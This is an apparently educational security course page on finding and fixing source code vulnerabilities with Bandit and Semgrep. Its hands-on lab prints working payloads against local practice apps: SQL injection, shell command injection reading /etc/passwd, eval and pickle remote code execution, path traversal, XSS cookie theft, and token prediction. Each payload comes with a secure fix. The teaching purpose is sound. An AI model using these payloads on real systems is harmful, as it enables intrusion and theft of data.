Source Code Vulnerability Management

Objectives: By the end of this topic, you will be able to…

  • Detect common vulnerabilities in real source code
  • Use static analysis tools to automate code review
  • Apply critical thinking to interpret and validate findings
  • Exploit confirmed vulnerabilities to demonstrate their real-world impact
  • Propose secure improvements to the code and verify they eliminate the attack vector

What is a vulnerability in code?

A source code vulnerability is a weakness in the logic or implementation of software that can be exploited to compromise its confidentiality, integrity, or availability. These flaws may allow an attacker to execute malicious code, access sensitive information, or alter the system’s behavior.


Main causes of vulnerabilities

Logical errors occur when the program’s logic does not account for all scenarios — for example, checking that a user is authenticated but not verifying their role before performing a sensitive action. These flaws require careful reading of intent and are often missed by automated tools.

Lack of input validation allows uncontrolled user data to reach critical functions, causing injections, logic failures, or leaks. The most common example is constructing SQL queries by concatenating strings:

# Vulnerable: attacker supplies username = "' OR '1'='1" to dump the whole table
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
 
# Safe: parameterized query — the database never interprets user input as SQL
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))

Use of insecure functions introduces risk because some standard library functions perform no bounds checking. The classic case in C is strcpy, which writes until it hits a null byte regardless of the destination buffer size:

/* Vulnerable: overwrites adjacent memory if src is longer than 63 chars */
char dest[64];
strcpy(dest, src);
 
/* Safe: limits the copy to n-1 bytes */
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0';

Insecure credential management exposes secrets by embedding them directly in source code, where they end up in version control and are visible to anyone with repository access:

# Vulnerable: secret committed to the repository
DB_PASSWORD = "hunter2"
 
# Safe: read from the environment at runtime — never stored in code
import os
DB_PASSWORD = os.environ.get("DB_PASSWORD")

Access control errors arise when code confuses authentication (confirming who the user is) with authorization (confirming what they are allowed to do). A common mistake is fetching a resource by a user-supplied ID without checking that the requester owns it:

# Vulnerable: any logged-in user can read any record by guessing its ID
def get_record(user_id, record_id):
    return db.query("SELECT * FROM records WHERE id = ?", (record_id,))
 
# Safe: verify ownership before returning data
def get_record(user_id, record_id):
    record = db.query("SELECT * FROM records WHERE id = ?", (record_id,))
    if record.owner_id != user_id:
        raise PermissionError("Access denied")
    return record

Relevant OWASP Top 10 categories

The OWASP Top 10 lists the most critical web application vulnerabilities. Those most related to source code:

CategoryDescriptionExample
A01 — Broken Access ControlUnauthorized access to functions or dataIDOR (Insecure Direct Object Reference)
A03 — InjectionSQL, OS command, or other injectionInadequate input validation
A07 — Auth FailuresAuthentication or session management failuresToken reuse, weak passwords
A08 — Integrity FailuresUsing compromised dependencies without verificationLibraries without hash checks
A09 — Logging FailuresNot logging relevant eventsOngoing attacks undetected
A10 — SSRFUser-controlled destination in outbound requestsInternal network scanning

Static vs dynamic analysis

SAST (Static Application Security Testing)

SAST is performed without executing the program — it examines source or binary code directly, looking for risky patterns such as injections, information leaks, input validation errors, and insecure functions. Its main advantage is that it integrates naturally into CI/CD pipelines, catching flaws early when remediation is cheap. Its limitation is that it can generate false positives and cannot verify behavior that only emerges at runtime.

Dynamic analysis (DAST or IAST)

Dynamic analysis runs the application and observes its actual behavior — making it useful for detecting vulnerabilities that only manifest at runtime, such as race conditions or logic flaws that depend on application state. It complements static analysis rather than replacing it.


SAST tools

ToolLanguageDescription
BanditPythonReviews code for insecure practices
SemgrepMulti-languageLightweight, customizable pattern detection
FlawfinderC/C++Classic tool for insecure function detection
SonarQubeMulti-languageSupports custom rules, quality + security
CodeQLMulti-languageComplex pattern queries on code (GitHub)
BrakemanRuby on RailsAnalysis for Rails applications
ESLint + Security PluginsJavaScript/TypeScriptSecurity-focused linting

These tools are often integrated into CI/CD pipelines to automatically scan code on each commit or pull request.


Interpreting and validating findings

Not all findings represent a real risk: the first step is to prioritize by severity and context, evaluating whether the vulnerable code is actually reachable by untrusted input. Next, assess reproducibility — can the finding be exploited, and under what conditions? Tracing the data flow from input to the vulnerable function helps confirm whether validation is truly absent. When a genuine flaw is confirmed, apply secure coding principles to fix it without breaking surrounding logic. Finally, document every finding thoroughly so it can be reviewed, corrected, and used as a learning reference by the team.


Hands-on lab

Requirements: Kali Linux, bandit, semgrep, Node.js

Part 0: Setting up the lab

# Install pipx
sudo apt install pipx
 
# Install scanner tools
pipx install bandit semgrep

Create a Semgrep account at semgrep.dev using your GitHub account.

Part 1: Python CLI tool

You are given insecure_script.py, a small Python backend utility. Your workflow for this part is: scan → exploit → patch → verify.

Step 1 — Scan. Run Bandit and save the full report:

bandit -r insecure_script.py 2>&1 | tee bandit_before.txt

For every HIGH and MEDIUM severity finding, record the line number, the Bandit rule ID, and what you think the risk is — before reading the code in depth.

Step 2 — Exploit. Run the script and work through each prompt. Do not change any code yet. Your goal is to confirm which findings represent real, triggerable vulnerabilities.

python3 insecure_script.py

User lookup — SQL injection: At the username prompt, enter ' OR '1'='1' --. Count the records returned and compare them to what a legitimate user should see. What did the injected condition do to the WHERE clause?

Network ping — command injection: Enter 127.0.0.1; whoami at the host prompt. The semicolon ends the ping command and starts a new shell command. Then try 127.0.0.1; cat /etc/passwd to read a system file. Screenshot the output.

Calculator — arbitrary code execution via eval: Enter __import__('os').system('id'). The function receives your input as a string and executes it as Python code. Record what the output reveals about the process running the script.

Session loader — pickle deserialization RCE: Pickle can encode arbitrary Python objects, including ones that run a system command when deserialized. In a separate terminal, generate a malicious payload:

python3 -c "
import pickle, os, base64
 
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('id',))
 
print(base64.b64encode(pickle.dumps(Exploit())).decode())
"

Paste the output at the session loader prompt and observe the command execute before load_session returns.

One-time tokens — insecure randomness: The script prints five tokens generated by random.randint. Note the approximate time. Then run the following to reproduce the same sequence:

python3 -c "
import random, time
random.seed(int(time.time()))
for _ in range(5):
    print(random.randint(100000, 999999))
"

random is seeded by the system clock, so an attacker who knows the generation time can predict every token issued during that second.

Hardcoded credentials — static finding: The remaining Bandit findings flag constants assigned at module level. No runtime interaction is needed — their presence in the source file means they will appear in every git commit, log, and deployment artefact. Document what each credential controls and what an attacker could do with it.

Step 3 — Patch. Fix every HIGH and MEDIUM finding. Use the table below as a guide, then write the secure version yourself:

VulnerabilitySecure pattern
SQL injectionParameterized queries: cursor.execute(query, (param,))
Command injectionPass arguments as a list, no shell=True: subprocess.check_output(["ping", "-c", "1", host])
eval / execRemove or replace; use ast.literal_eval only for safe literal parsing
Pickle deserializationUse json for untrusted data
Hardcoded credentialsos.environ.get("VAR_NAME") — never store secrets in source code
Weak password hashbcrypt or argon2 for passwords; hashlib.sha256 for non-secret digests
Insecure randomsecrets.token_hex() or secrets.randbelow() for security-sensitive values

Add a short comment to every line you change explaining what you fixed and why.

Step 4 — Verify. Rerun Bandit — it should report zero HIGH or MEDIUM findings. Then rerun the script and attempt each exploit again. Every attack should now either raise an error or produce no useful output.

bandit -r insecure_script.py 2>&1 | tee bandit_after.txt
python3 insecure_script.py

? Which finding was hardest to exploit — and which was hardest to patch correctly? Did exploiting them change the order in which you prioritized the fixes?


Part 2: Node.js web application

You are given a small Express application in nodejs-app/. Your workflow is the same: scan → exploit → patch → verify.

Step 1 — Deploy and scan.

cd nodejs-app
npm install
npm start &    # runs on http://localhost:3000
semgrep --config=auto app.js 2>&1 | tee semgrep_before.txt

For each Semgrep finding, record the line, the rule ID, the affected endpoint, and your hypothesis about how it could be exploited.

Step 2 — Exploit. With the server running, attack every endpoint. Screenshot or save the output of each successful exploit before changing any code.

Hardcoded secrets — static finding: Locate the constants Semgrep flags near the top of app.js. Describe what an attacker who reads the source (or who obtains a leaked build artefact) could do with each value.

Reflected XSS — GET /hello: Open a browser and navigate to:

http://localhost:3000/hello?name=<script>alert(document.cookie)</script>

Observe the script execute. Now craft a payload that exfiltrates the page’s cookies to an external endpoint — use Webhook.site to receive the request and confirm the data arrived.

SQL injection — GET /user:

# Return every row in the users table
curl -G --data-urlencode "username=' OR '1'='1" http://localhost:3000/user
 
# Target the admin record specifically
curl -G --data-urlencode "username=admin'--" http://localhost:3000/user

Compare what you receive to what the endpoint is supposed to return for a normal request.

Path traversal — GET /file:

curl -G --data-urlencode "name=../../../../etc/passwd" http://localhost:3000/file
curl -G --data-urlencode "name=../../../../etc/hostname" http://localhost:3000/file

How far outside the intended directory can you navigate? What limits you?

Command injection — GET /ping:

curl -G --data-urlencode "host=127.0.0.1; id" http://localhost:3000/ping
curl -G --data-urlencode "host=127.0.0.1; cat /etc/passwd" http://localhost:3000/ping

IDOR — GET /note:

curl "http://localhost:3000/note?id=1"

No authentication is required. What does this mean for a multi-user application where notes are supposed to be private?

Credentials in URL — GET /login:

curl "http://localhost:3000/login?username=admin&password=admin123"

Switch to the terminal running npm start and find the request in the access log. Explain why GET parameters are a poor choice for credentials even when HTTPS is in use.

eval RCE — GET /calc:

curl -G --data-urlencode "expr=require('child_process').execSync('id').toString()" http://localhost:3000/calc
curl -G --data-urlencode "expr=require('fs').readFileSync('/etc/passwd','utf8')" http://localhost:3000/calc

Missing security headers:

curl -I http://localhost:3000/hello

Note which headers are absent. Look up what each missing header protects against and how the reflected XSS exploit from earlier could be partially mitigated by a correct Content-Security-Policy.

Step 3 — Patch. Fix every finding in app.js:

VulnerabilitySecure pattern
Hardcoded secretsprocess.env.VAR_NAME; document required variables in a .env.example file
Reflected XSSEscape user input before inserting it into HTML; add a Content-Security-Policy header
SQL injectionParameterized queries using ? placeholders: db.get(query, [param], callback)
Path traversalpath.resolve() the final path and assert it starts with the allowed directory
Command injectionUse execFile with an argument array instead of exec with a shell string
IDORRequire authentication; verify the authenticated user owns the requested resource
Credentials in URLAccept credentials via POST body only; never read passwords from query parameters
eval RCERemove the endpoint; if a calculator is needed, use a safe math parser library
Missing headersapp.use(require('helmet')()) as the first middleware

Step 4 — Verify. Stop the server, restart with the patched code, and rerun Semgrep:

pkill -f "node app.js"
npm start &
semgrep --config=auto app.js 2>&1 | tee semgrep_after.txt

Rerun every curl command and browser request from Step 2. Each attack must either be rejected with an appropriate error or return sanitized output. Capture a screenshot for each one.

? Which vulnerability in the web application had the largest gap between how simple it was to exploit and how much damage it could cause in a real deployment? How did your answer change after you ran the exploit versus when you only read the Semgrep finding?

Cleanup

pkill -f "node app.js"

Submission

Compressed folder including:

  • bandit_before.txt and bandit_after.txt
  • semgrep_before.txt and semgrep_after.txt
  • Terminal output or screenshots for every successful exploit (before patching)
  • Patched insecure_script.py and app.js with explanatory comments on every changed line
  • Written reflection (max. 1 page): which vulnerability surprised you most once you exploited it, and why

Key concepts

TermDefinition
SASTSource code analysis without executing the application
VulnerabilityExploitable weakness in a system or application
SQLiInjection of malicious SQL code into input fields
XSSInjection of malicious scripts into web pages
BanditSAST tool for Python code
SemgrepMulti-language and customizable static analyzer
OWASP Top 10List of the ten most critical web vulnerabilities

Navigation:Previous | Home | Next